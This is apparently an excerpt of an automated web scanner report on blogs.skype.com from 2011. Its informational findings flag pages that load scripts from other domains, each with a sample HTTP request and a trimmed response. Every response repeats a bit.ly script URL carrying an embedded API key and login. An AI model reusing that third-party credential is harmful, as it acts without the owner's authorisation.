<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.102. http://blogs.skype.com/en/insight/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/insight/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/insight/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:09 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 225293
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.103. http://blogs.skype.com/en/iphone/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/iphone/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/iphone/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:10 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 84563
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.104. http://blogs.skype.com/en/life_at_skype/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/life_at_skype/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/life_at_skype/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:11 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 114247
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.105. http://blogs.skype.com/en/mac/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/mac/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/mac/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:12 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 102498
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.106. http://blogs.skype.com/en/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/mobile/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/mobile/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:13 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 264936
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.107. http://blogs.skype.com/en/mwc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/mwc/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/mwc/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:14 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 60235
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.108. http://blogs.skype.com/en/open_internet/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/open_internet/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/open_internet/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:15 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 105907
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.109. http://blogs.skype.com/en/palm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/palm/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/palm/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:15 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 59335
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.110. http://blogs.skype.com/en/skype_on_your_tv/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/skype_on_your_tv/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/skype_on_your_tv/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:16 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 105119
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.111. http://blogs.skype.com/en/social_good/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/social_good/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/social_good/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:17 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 72500
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.112. http://blogs.skype.com/en/sony_ericsson/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/sony_ericsson/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/sony_ericsson/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:18 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 66399
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.113. http://blogs.skype.com/en/subscriptions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/subscriptions/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/subscriptions/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:19 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 107961
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.114. http://blogs.skype.com/en/symbian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/symbian/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/symbian/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:20 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 66381
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.115. http://blogs.skype.com/en/verizon_wireless/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/verizon_wireless/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/verizon_wireless/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:21 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 97811
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.116. http://blogs.skype.com/en/wifi/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/wifi/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/wifi/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:21 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 72889
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
